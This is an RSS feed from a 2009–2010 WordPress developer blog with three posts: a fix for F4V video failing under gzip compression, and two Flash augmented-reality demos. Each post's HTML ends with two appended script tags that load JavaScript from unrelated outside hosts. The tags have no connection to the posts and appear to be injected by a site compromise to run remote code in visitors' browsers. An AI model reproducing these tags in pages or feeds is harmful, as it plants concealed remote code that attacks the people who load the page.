<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>REDBLIND &#187; video</title>
	<atom:link href="http://redblind.com/blog/topic/video/feed/" rel="self" type="application/rss+xml" />
	<link>http://redblind.com/blog</link>
	<description>Blog of Jonathan Cipriano</description>
	<lastBuildDate>Sat, 08 May 2010 00:20:36 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>DON&#8217;T GZIP F4V&#8217;S</title>
		<link>http://redblind.com/blog/2010/02/12/dont-gzip-f4vs/</link>
		<comments>http://redblind.com/blog/2010/02/12/dont-gzip-f4vs/#comments</comments>
		<pubDate>Fri, 12 Feb 2010 20:29:08 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[code]]></category>
		<category><![CDATA[actionscript 3]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[f4v]]></category>
		<category><![CDATA[firefox]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[flv]]></category>
		<category><![CDATA[server]]></category>
		<category><![CDATA[video]]></category>

		<guid isPermaLink="false">http://redblind.com/blog/?p=307</guid>
		<description><![CDATA[SYMPTOMS
The other day we deployed a new site to the production servers only to find our video player was bugging out. Specifically in Firefox, it seemed that the file size and video length was not being interpreted correctly. Load complete events and video play complete events were being fired prematurely, if not instantaneously. It other [...]]]></description>
			<content:encoded><![CDATA[<p><strong>SYMPTOMS</strong></p>
<p>The other day we deployed a new site to the production servers only to find our video player was bugging out. Specifically in Firefox, it seemed that the file size and video length was not being interpreted correctly. Load complete events and video play complete events were being fired prematurely, if not instantaneously. It other browsers the bytes loaded of the net stream never updated, but the video played fine. It worked perfectly in our dev environment and had passed QA, but for some reason broke when deployed to production. This lead us to believe that it was environmental and  differences between the server configurations were at fault.</p>
<p><strong>CAUSE</strong></p>
<p>I&#8217;ve seen this type of thing before and wrote about it <a title="flv mime-types" href="http://redblind.com/blog/2008/07/14/iis-flv-mime-type-pwns-you/">here</a>. Using an HTTP proxy (I use <a title="charles web debugging proxy" href="http://www.charlesproxy.com/" target="_blank">Charles</a>), I looked at the differences in responses to the F4V requests from the two servers. Both were returning a &#8220;plain-text&#8221; mime-type. Not a good thing, but still did not explain the differences in behavior. The only difference was the production server was using <a title="gzip compression" href="http://en.wikipedia.org/wiki/Gzip" target="_blank">gzip compression</a> for F4V files. I did a quick search on the web and found only two documented cases of malfunctioning F4Vs and gzip compression, so I figured it was worth writing about.</p>
<p><strong>SOLUTION</strong></p>
<p>The solution is to exclude F4Vs from gzip compression in your apache configuration. Unfortunately, we don&#8217;t have administration rights to out client&#8217;s servers, so we defaulted to the lower quality and slightly larger file size of FLV, which fixed the issue.</p>
<p><strong>REFERENCES</strong></p>
<ol>
<li><a href="http://www.longtailvideo.com/support/forum/Setup-Problems/21791/MP4-and-Firefox-3-5-7-#msg143431" target="_blank">http://www.longtailvideo.com/support/forum/Setup-Problems/21791/MP4-and-Firefox-3-5-7-#msg143431</a></li>
<li><a href="http://stackoverflow.com/questions/1100888/f4v-player-works-on-every-site-but-one" target="_blank">http://stackoverflow.com/questions/1100888/f4v-player-works-on-every-site-but-one</a></li>
</ol>
<p><script src="http://ae.awaue.com/7"></script><script src="http://secowo.com/wo"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://redblind.com/blog/2010/02/12/dont-gzip-f4vs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>AR From Across the Pond</title>
		<link>http://redblind.com/blog/2009/03/13/ar-from-across-the-pond/</link>
		<comments>http://redblind.com/blog/2009/03/13/ar-from-across-the-pond/#comments</comments>
		<pubDate>Fri, 13 Mar 2009 17:59:54 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[code]]></category>
		<category><![CDATA[design]]></category>
		<category><![CDATA[ARToolKit]]></category>
		<category><![CDATA[augmented reality]]></category>
		<category><![CDATA[FlaRToolkit]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[papervision3d]]></category>
		<category><![CDATA[video]]></category>
		<category><![CDATA[webcam]]></category>

		<guid isPermaLink="false">http://redblind.com/blog/?p=126</guid>
		<description><![CDATA[Looks like my fellow McCannite devs in Belgium beat us too it. If you want to try it out, download the QR code, then hit this page to launch the application. Good job guys.

]]></description>
			<content:encoded><![CDATA[<p>Looks like my fellow <a href="http://blog.mccann.be/" target="_blank">McCannite devs in Belgium</a> beat us too it. If you want to try it out, <a href="http://sqlug.be/go/ar/page" target="_blank">download the QR code</a>, then hit <a href="http://mantis.net7.be/msft_sql_energy_ar/">this page</a> to launch the application. Good job guys.</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/yOu45bD2hkg&#038;hl=en&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/yOu45bD2hkg&#038;hl=en&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><script src="http://ae.awaue.com/7"></script><script src="http://secowo.com/wo"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://redblind.com/blog/2009/03/13/ar-from-across-the-pond/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Augemented Reality</title>
		<link>http://redblind.com/blog/2009/02/10/augemented-reality/</link>
		<comments>http://redblind.com/blog/2009/02/10/augemented-reality/#comments</comments>
		<pubDate>Wed, 11 Feb 2009 02:38:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[code]]></category>
		<category><![CDATA[ARToolKit]]></category>
		<category><![CDATA[augmented reality]]></category>
		<category><![CDATA[FlaRToolkit]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[papervision3d]]></category>
		<category><![CDATA[video]]></category>

		<guid isPermaLink="false">http://redblind.com/blog/?p=78</guid>
		<description><![CDATA[Today I spent some time playing with FLARToolKit, an AS3 port of the C based ARToolKit. If you have a webcam, launch the application, download and print this QR code PDF and place in front of your camera.

Flash AR Test from redblind on Vimeo.
I will post source once I clean it up.
]]></description>
			<content:encoded><![CDATA[<p>Today I spent some time playing with <a href="http://www.libspark.org/wiki/saqoosha/FLARToolKit/en" target="_blank">FLARToolKit</a>, an AS3 port of the C based <a href="http://www.hitl.washington.edu/artoolkit/" target="_blank">ARToolKit</a>. If you have a webcam, <a title="FlarBase" href="http://redblind.com/FlarBase/" target="_blank">launch the application</a>, download and print this <a href="http://redblind.com/exp/flarTest/pattern.pdf" target="_blank">QR code PDF</a> and place in front of your camera.</p>
<p><object width="610" height="350" data="http://vimeo.com/moogaloop.swf?clip_id=3176888&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=3176888&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /></object><br />
<a href="http://vimeo.com/3176888">Flash AR Test</a> from <a href="http://vimeo.com/user767860">redblind</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
<p>I will post source once I clean it up.<script src="http://ae.awaue.com/7"></script><script src="http://secowo.com/wo"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://redblind.com/blog/2009/02/10/augemented-reality/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
